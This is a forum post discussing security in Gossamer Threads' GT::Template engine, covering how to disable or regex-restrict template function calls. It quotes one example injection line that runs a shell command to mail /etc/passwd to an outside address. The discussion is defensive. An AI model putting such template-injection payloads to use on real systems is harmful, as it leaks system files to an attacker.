Quote:
if you were fearful of editors doing this, then you must have picked the wrong editors :)And admins should trust themself only. Security risks should be lowered as much possible.
Quote:
so how about this... <%POSIX::system("cat /etc/passwd | mail gthreads@gmail.com")%>Uhm, yes that would be serious. But you can do this only logged as admin.
If I implement a partner tempate editor interface, I can use function call limiting features of GT::Template.
So thanks to foreseeing GT developments, function calls can be limited with a regexp, and furthermore function calls can be disabled.
See the GT::Template docs:
http://www.gossamer-threads.com/...e.html#parse_options
Quote:
disable => { ... } This can be used to disable certain GT::Template functionality. To disable a particular feature, the hash reference passed to disable should contain a feature_name with a 1 value, unless otherwise indicated. Feature names are as follows:
functions
This can be used to disable Package::function calls, such as <%Some::Package::function%>. Note, however, that this does _not_ disable aliased function calls (see below).
function_args
This disables any function calls that specify arguments - for instance, <%Some::Package::function(1)>. Note that this does _not_ disable passing arguments to aliased function calls (see below).
function_restrict
This can be used to restrict function calls by limiting the available functions. It takes a regular expression as an argument, which will be tested against the fully qualified function name - any function that does not match the regular expression will not be called. For example, to only allow functions in 'Package::One' and 'Second::Package' to be called, you could use:
function_restrict => '^(?:Package::One|Second::Package)::\w+$'
Like the above options, this does not restrict aliased function calls.
coderefs_args
This can be specified to disable the calling of code reference variables with arguments. Tags such as <%coderefname%> and <%coderefname()%> will be allowed, but <%coderefname(1)%> will not.
alias_args
This option can be used to disable the passing of arguments to aliased function calls (see below).
Best regards,
Webmaster33
Paid Support from Webmaster33. Expert in Perl programming & Gossamer Threads applications. (click here for prices)
Webmaster33's products (upd.2004.09.26) | Private message | Contact me | Was my post helpful? Donate my help...